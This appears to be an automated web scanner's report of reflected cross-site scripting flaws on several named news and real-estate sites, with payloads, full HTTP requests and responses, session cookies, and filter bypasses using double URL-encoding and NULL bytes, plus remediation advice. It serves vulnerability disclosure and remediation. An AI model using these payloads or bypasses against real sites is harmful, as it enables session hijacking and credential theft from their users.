Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.forsalebyowner.com/22625219 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.forsalebyowner.com
Path: /22625219
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd25b"><script>alert(1)</script>c2c77e7f69e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /22625219?bd25b"><script>alert(1)</script>c2c77e7f69e=1 HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
1.2. http://www.forsalebyowner.com/content/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.forsalebyowner.com
Path: /content/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14576%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15a6b254d06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14576\\\"><script>alert(1)</script>15a6b254d06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /content/index.php?option=com_content&id/14576%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15a6b254d06=142 HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:54:18 GMT
Server: Apache
Set-Cookie2: FSBO=144.142.228.219.1292180058479324; path=/; max-age=86400
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b1a4ae362090dfc039c82666bbc9b309=b94a8d58190a54436e5d37bff92144cd; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Last-Modified: Sun, 12 Dec 2010 18:54:18 GMT
Vary: Accept-Encoding
WebServer: web4
Diagnostics: t=1292180058479065 D=99991
Content-Length: 27443
Keep-Alive: timeout=60, max=454
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
1.3. http://www.forsalebyowner.com/framewrap.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.forsalebyowner.com
Path: /framewrap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d56c"><script>alert(1)</script>c75153ebd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d56c\"><script>alert(1)</script>c75153ebd9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /framewrap.html?url=http://p01.bestplaces.net/fsbo/nh/col1.asp&8d56c"><script>alert(1)</script>c75153ebd9a=1 HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b365c"><script>alert(1)</script>304f5c9456c was submitted in the url parameter. This input was echoed as b365c\"><script>alert(1)</script>304f5c9456c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /framewrap.html?url=http://p01.bestplaces.net/fsbo/nh/col1.aspb365c"><script>alert(1)</script>304f5c9456c HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-885 ...[SNIP]... <iframe id="FrameRTQ" src="http://p01.bestplaces.net/fsbo/nh/col1.aspb365c\"><script>alert(1)</script>304f5c9456c?" width="600" height="600" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="auto" align="center" style="margin-top:6px;"> ...[SNIP]...
1.5. http://www.forsalebyowner.com/listing/19916 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.forsalebyowner.com
Path: /listing/19916
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c158"><script>alert(1)</script>f7bb22fc95f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /listing/19916?5c158"><script>alert(1)</script>f7bb22fc95f=1 HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
1.6. http://www.forsalebyowner.com/listing/3FCC5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.forsalebyowner.com
Path: /listing/3FCC5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fe5a"><script>alert(1)</script>57511cacdc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /listing/3FCC5?6fe5a"><script>alert(1)</script>57511cacdc6=1 HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
1.7. http://www.forsalebyowner.com/listing/EC84C [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.forsalebyowner.com
Path: /listing/EC84C
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b10"><script>alert(1)</script>b0b028cefaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /listing/EC84C?74b10"><script>alert(1)</script>b0b028cefaa=1 HTTP/1.1
Host: www.forsalebyowner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c16"><script>alert(1)</script>579382e6df was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dl/index.jhtml?spid=473&spu=true&partner=ZLxdm00336c16"><script>alert(1)</script>579382e6df HTTP/1.1
Host: www.iwon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:54:37 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: ltm=2516670986.20480.0000; expires=Sun, 26-Dec-2010 18:54:38 GMT; path=/
Content-Length: 56270
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the watchId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af696"%3balert(1)//31a72675676 was submitted in the watchId parameter. This input was echoed as af696";alert(1)//31a72675676 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videobeta/?watchId=3a7f00a4-099b-4806-b78f-37c316fcb6c4af696"%3balert(1)//31a72675676 HTTP/1.1
Host: www.ktla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007738b"><script>alert(1)</script>b76e620781 was submitted in the class parameter. This input was echoed as 7738b"><script>alert(1)</script>b76e620781 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=9010%2C+72100%007738b"><script>alert(1)</script>b76e620781&class=9020%2C+72300&class=9015%2C+72600&days=7&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s28z1n1
Cache-Control: private, max-age=299
Date: Sun, 12 Dec 2010 18:58:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124521
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6292"><script>alert(1)</script>6f53d9163ef was submitted in the class parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=4200-5998%2C+51810%2C+51820%2C+51830%2C+51850%2C+51860%2C+51870%2C+55014%2C+52100%2C+52200%2C+52300%2C+54600%2C+54620%2C+54640%2C+54660%2C+54680%2C+54700%2C+54800%2C+54820%2C+54840%2C+54860f6292"><script>alert(1)</script>6f53d9163ef&days=7&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s29z1n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 18:58:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132511
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the days request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d84e"><script>alert(1)</script>5224f5a2dcf was submitted in the days parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=4200-5998%2C+51810%2C+51820%2C+51830%2C+51850%2C+51860%2C+51870%2C+55014%2C+52100%2C+52200%2C+52300%2C+54600%2C+54620%2C+54640%2C+54660%2C+54680%2C+54700%2C+54800%2C+54820%2C+54840%2C+54860&days=79d84e"><script>alert(1)</script>5224f5a2dcf&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s30z1n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 18:58:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132523
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.13. http://www.latimes.com/classified/automotive/results.classified [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.latimes.com
Path: /classified/automotive/results.classified
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4666"><script>alert(1)</script>6b4b288ed86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=4200-5998%2C+51810%2C+51820%2C+51830%2C+51850%2C+51860%2C+51870%2C+55014%2C+52100%2C+52200%2C+52300%2C+54600%2C+54620%2C+54640%2C+54660%2C+54680%2C+54700%2C+54800%2C+54820%2C+54840%2C+54860&days=7&date=all&e4666"><script>alert(1)</script>6b4b288ed86=1 HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s27z2n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 18:59:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132421
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f72f7"%3balert(1)//bf1d7350563 was submitted in the categoryId parameter. This input was echoed as f72f7";alert(1)//bf1d7350563 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z2n1
Vary: Accept-Encoding
Cache-Control: private, max-age=297
Date: Sun, 12 Dec 2010 18:53:56 GMT
Connection: close
Content-Length: 9238
<html> <head>
</head> <body style="margin:0px;"> <script src="/hive/javascripts/video-tool.js" type="text/javascript"></script> <script src="/hive/javascripts/AC_OETag ...[SNIP]... inor version of Flash required var requiredRevision = 0; //video URL - use itemId = unique single video id var singleTemp = "empty"; var multipleTemp = "2b1ee0af-96d0-4513-9efa-6fea81c043daf72f7";alert(1)//bf1d7350563"; var marketDomain = "latimes.com"; marketDomain = marketDomain.split(".");
var frameID = "tivideo-1799444053";
// Omniture account var omnitureAccount = "tribglobaldev"; var om ...[SNIP]...
The value of the itemId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccb1f"%3balert(1)//5a3144ce737 was submitted in the itemId parameter. This input was echoed as ccb1f";alert(1)//5a3144ce737 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s27z1n1
Vary: Accept-Encoding
Cache-Control: private, max-age=276
Date: Sun, 12 Dec 2010 18:53:56 GMT
Connection: close
Content-Length: 9228
<html> <head>
